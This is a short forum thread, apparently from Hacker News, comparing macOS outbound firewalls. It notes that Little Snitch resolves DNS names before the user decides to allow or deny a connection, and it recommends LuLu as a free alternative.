Comment by runjake
20 hours ago
Little Snitch is probably the most popular one, written my devs who deeply understand macOS firewall architecture.
20 hours ago
Little Snitch is probably the most popular one, written my devs who deeply understand macOS firewall architecture.
Little Snitch is a user-friendly, software-level blocker, only – use with caution.
Just FYI: LittleSnitch pre-resolves DNS entries BEFORE you click `Accept/Deny`, if you care & understand this potential security issue. Your upstream provider still knows whether you denied a query. Easily verifiable with a PiHole (&c).
I liken the comparison to disk RAIDs: a RAID is not a true backup; LittleSnitch is not a true firewall.
You need isolated hardware for true inbound/outbound protection.
>Just FYI: LittleSnitch pre-resolves DNS entries BEFORE you click `Accept/Deny`, if you care & understand this potential security issue. Your upstream provider still knows whether you denied a query. Easily verifiable with a PiHole (&c).
This also feels like an exfil route? Are DNS queries (no tcp connect) logged/blocked?
>Are DNS queries blocked?
No, not with LittleSnitch (neither in/out-bound).
When you see the LittleSnitch dialogue (asking to `Accept/Deny`), whatever hostname is there has already been pre-resolved by upstream DNS provider (does not matter which option you select). This software pares well with a PiHole (for easy layperson installs), but even then is insufficient for OP's attack.
Little Snitch is commercial. If you want largely similar features (focused on egress), check out LuLu: https://github.com/objective-see/LuLu
+1 Thanks, I forgot about LuLu!